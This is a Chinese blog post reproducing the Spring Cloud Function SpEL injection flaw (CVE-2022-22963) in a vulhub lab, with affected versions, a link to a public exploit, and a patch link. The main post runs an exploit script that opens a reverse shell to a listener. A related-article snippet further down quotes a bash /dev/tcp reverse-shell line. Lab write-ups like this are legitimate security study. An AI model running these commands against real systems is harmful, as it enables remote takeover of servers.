Spring Cloud Function SPEL表达式注入漏洞(CVE-2022-22963)

最新推荐文章于 2024-08-10 16:05:10 发布
最新推荐文章于 2024-08-10 16:05:10 发布
阅读量7.6k 收藏 2
点赞数
文章标签: 安全 spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36197704/article/details/123990984
版权

1.漏洞描述

       SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头

spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。

2.影响版本

Spring Cloud Function 3.0.0 <= v3.2.2

3.POC和EXP

下载地址:https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE

4.漏洞环境搭建

本次环境使用docker+vulhub搭建,进入vulhub/spring/CVE-2022-22963目录,执行docker-compose up –d安装

端口默认8080,访问Spring Web页面

5.漏洞复现

使用POC脚本检测,可以批量检测

创建url.txt,内容为http://192.168.42.143:8080/

使用exp脚本反弹shell

Kali开启监听

反弹shell

python3 Spel_RCE_Bash_EXP.py http://192.168.42.143:8080/ 192.168.42.147 1919

6.修复建议

官方目前发布了修复此漏洞的 commit:https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f,可下载官方的修复代码重新编译打包。

chaojixiaojingang
关注
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
07-08
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
SpringCloud Function SpEL漏洞复现 (CVE-2022-22963)
oiadkt的博客
04-21 756
SpringCloud Function SpEL漏洞复现 (CVE-2022-22963)
春秋云境:CVE-2022-22963[漏洞复现]
最新发布
如有错误感谢斧正
08-10 534
到2024年8月11日,为期14天的专项国护结束最近都在忙攻防看1day、nday复现,现在有空了写一下靶场的复现。
CVE-2022-22963Spring Cloud Function SpEL 远程代码执行漏洞
冬的博客
04-11 4153
读者需知 本文仅供学习使用,由于传播和利用此文所造成的损失均由使用者本人负责,文章作者不为此承担责任 简介 SpringCloud Function作为SpringCloud家族成员最早在2017年提出,旨在为快速发展的Serverless市场提供一个Spring的接入路径,使用SpringCloud Function进行无服务(我这里直接称为函数式编程)的项目开发可以大大节约成本,同时对于SpringBoot熟悉的人可以迅速上手 最近Spring Cloud Function组件爆出0day .
CVE-2022-22963 SpringCloud Function SpEL注入漏洞分析
阿道夫的博客
01-30 2479
在研究分析了CVE-2022-22980 Spring Data MongoDBSpEL表达式注入漏洞之后,想起之前在spring4shell爆出之前,存在于SpringCloudFunction中的一个SpEL表达式注入漏洞,编号为CVE-2022-22963。在这里对其进行一波分析和学习。
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行 漏洞复现
热爱学习,喜欢折腾!
08-28 5370
SpringCloud 是一套分布式系统的解决方案,实现就是函数式编程,在视频转码、音视频转换、数据仓库ETL等与状态相关度低的领域运用的比较多。开发者无需关注服务器环境运维等问题上,专注于自身业务逻辑实现即可。在Spring Cloud Function版本3.1.6,3.2.2和更早的不受支持的版本中,当使用路由功能时,用户可以提供特制的SpEL作为路由表达式,这可能导致远程执行代码和访问本地资源。............
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞 复现
weixin_45715461的博客
07-10 2993
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞 复现
【vulhub系列】CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
Wiofgb的博客
08-28 3079
记录一次CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
『Java CVECVE-2022-22963: Spring Cloud Function SPEL表达式注入RCE
Ho1aAs‘s Blog
07-28 1469
## 漏洞简介 向`/functionRouter`路由发送headers带有`spring.cloud.function.routing-expression`键的POST包时,会触发SPEL解析该键值 ## 影响范围 3.0.0
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 存在任何使用问题可以私信本人。
春秋云境:CVE-2022-22963
一只爱吃橙子的羊
01-20 921
SpringCloudFunctionSpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 题目链接为:http://ip:port P.S 卡慢不影响拿flag
Spring Cloud Function SpEL注入漏洞CVE-2022-22963)分析
AKAMAI_CHINA的博客
01-01 562
2022年3月24日,Pivotal修补了Spring Cloud Function中一个关键的服务器端代码注入漏洞Spring表达式语言注入),该漏洞有可能导致系统被攻击。
Spring Cloud Function Spel表达式注入漏洞分析
m0_67391120的博客
08-24 885
简单了解了一下FaaS的的函数交付模式,和之前研究的容器安全场景下的微服务架构非常的契合,以往的大多数环境主要通过虚拟机交付逐渐演变了成了VPS、容器、API到现在的函数即服务;找到对应方法的RoutingFunction.class的文件内容,定位到对应的第80行的代码出,可以发现该方法主要Message的内容已经被传递过来;相关的配置项目可以在pom.xml当中进行修改,从项目当中可以看到依赖的组件版本为3.2.2是存在漏洞的版本,即可直接启动项目,无需其他的修改;
Spring Cloud Function SpEL 代码注入漏洞复现 (CVE-2022-22963)
yang1234567898的博客
04-25 3846
漏洞复现 启动vulhub靶场环境,出现下面的页面说明启动成功 首先,先用nc监听1234端口 需要将反弹shell的命令进行编码 bash -i >& /dev/tcp/192.168.96.1/1234 0>&1 编码脚本如下,直接复制改后缀名为.html打开即可 <!DOCTYPE html> <html> <head> <title>java runtime exe...
Spring Cloud Function SpEL 代码注入 (CVE-2022-22963)
不曾扬帆,何以至远方
07-18 2866
Spring Cloud Function SpEL Code Injection (CVE-2022-22963)
漏洞复现-CVE-2022-22963-Spring Cloud Function SpEL RCE 远程代码执行漏洞
m0_65454485的博客
08-08 1825
漏洞复现-CVE-2022-22963-Spring Cloud Function SpEL RCE 远程代码执行漏洞
spring漏洞复现(cve-2022-22947,cve-2022-22963,cve-2022-22965)
qq_57939909的博客
08-30 1351
spring漏洞复现
SpringCloud Function SpEL注入漏洞详解 CVE-2022-22963
"SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963)" 本文将深入探讨SpringCloud Function中的一个安全问题,即Spring Expression Language (SpEL) 注入漏洞,该漏洞被追踪为CVE-2022-22963SpringCloud ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值